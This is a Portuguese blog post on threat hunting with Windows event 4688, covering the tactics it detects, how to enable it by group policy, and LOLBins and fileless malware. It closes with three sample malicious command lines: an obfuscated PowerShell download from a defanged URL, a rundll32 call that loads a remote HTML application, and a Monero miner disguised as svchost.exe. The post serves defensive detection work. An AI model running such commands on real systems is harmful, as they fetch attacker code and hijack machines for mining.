News Ticker

Hunting 4688

18 de dezembro de 2022 Daniel Donda DFIR 0

O evento de segurança 4688 é gerado sempre que um novo processo é iniciado.

Analisando o Windows Logging Attack Matrix é possível verificar que o evento 4688 cobre as táticas de:

Discovery
Initial Access
Collection
Command and Control
Credential Access
Persistence
Defense Evasion
Lateral Movement
Privilege Escalation

A partir da versão Windows Server 2012 R2, Windows 8.1 o campo “Linha de comando do processo” foi adicionado

Infelizmente, o log de ID de evento 4688 não está habilitado por padrão. No entanto, habilitá-lo é relativamente simples e pode ser feito globalmente por meio do Windows Group Policy Object (GPO).

Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Detailed Tracking\Audit Processe Creation

LOLBIN e Fileless Malware

LOLBins são perigosos porque sua execução parece legitima no início e às vezes até segura. Além disso, o uso de um arquivo assinado e verificado digitalmente aumenta a falsa segurança e mantém fora do radar.
Saiba mais no artigo Living Off the Land Binaries (LOLBins)

O termo Fileless Malware é usado para descrever uma categoria de malware que opera apenas na memória e não grava arquivos no disco.

Através do monitoramento do evento 4688 é possível ter uma atenção maior a esses recursos usados por “mineradores de cripto moedas e atacantes.

Exemplos:

cmd.exe /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).(‘Down’+’loadFile’).Invoke(‘hxxps://tinyurl.com/y6vlgvu’,’pd.bat’)

rundll32.exe hxxp://hpsjh.firewall-gateway.net:8080/MicrosoftUpdate?6MCQ7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;......./mshtml,RunHTMLApplication

svchost.exe -B — coin=monero — url=xmr.pool.minergate.com:45700 — user=eaz0xj5zhawrnds — pass=x — cpu-max-threads-hint=50 — donate-level=4